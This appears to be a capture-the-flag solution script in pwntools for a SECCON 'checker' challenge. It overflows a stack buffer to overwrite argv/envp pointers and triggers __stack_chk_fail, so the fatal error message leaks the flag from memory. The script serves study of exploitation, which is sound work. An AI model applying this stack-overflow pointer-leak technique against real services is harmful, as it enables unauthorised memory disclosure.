Summary: overwrite the argv[1] pointer so that the flag in memory is leaked by the fatal message of __stack_chk_fail. The LIBC_FATAL_STDERR_ environment variable must be set so that the message goes to stderr, which the service redirects over the network.
#!/usr/bin/env python3
# Ported from Python 2 to Python 3 (bytes payloads, print()/input()) so it runs with
# current pwntools; the send/receive sequence is unchanged.
from pwn import *

context.arch = 'amd64'  # i386 / arm
# recvuntil sendline, pack, recv, send

r = remote('checker.pwn.seccon.jp', 14726)
# r = process(['./checker'])
input('attach')  # pause here to attach a debugger before the first send

# start pwn.
print(r.recvuntil(b'NAME : '))
# Set LIBC_FATAL_STDERR_ (see the summary) so the fatal message reaches stderr.
r.sendline(b'LIBC_FATAL_STDERR_=1')
print(r.recvuntil(b'>> '))


def overwrite_pointer(offset, value, high_bytes):
    """Replace the 8-byte pointer stored `offset` bytes past the buffer with `value`.

    Clear the pointer's high bytes one at a time (each shorter line puts its
    terminating NUL one byte lower), then write the packed value over the low bytes.
    """
    for n in high_bytes:
        r.sendline(b'A' * (offset + n))
        print(r.recvuntil(b'>> '))
    r.sendline(b'A' * offset + pack(value))
    print(r.recvuntil(b'>> '))


# overwrite envp[1] to 0x601040
overwrite_pointer(0x188, 0x601040, [6, 5, 4])
# pointer at 0x180 -> 0x601040
overwrite_pointer(0x180, 0x601040, [7, 6, 5, 4])
# pointer at 0x178 -> 0x6010c0
overwrite_pointer(0x178, 0x6010c0, [7, 6, 5, 4])

r.sendline(b'yes')
print(r.recvuntil(b'FLAG : '))
input()
# One more overflow makes the canary check fail; the fatal message is then
# printed through the overwritten pointer, leaking the flag.
r.sendline(b'fuck')
# get shell?
r.interactive()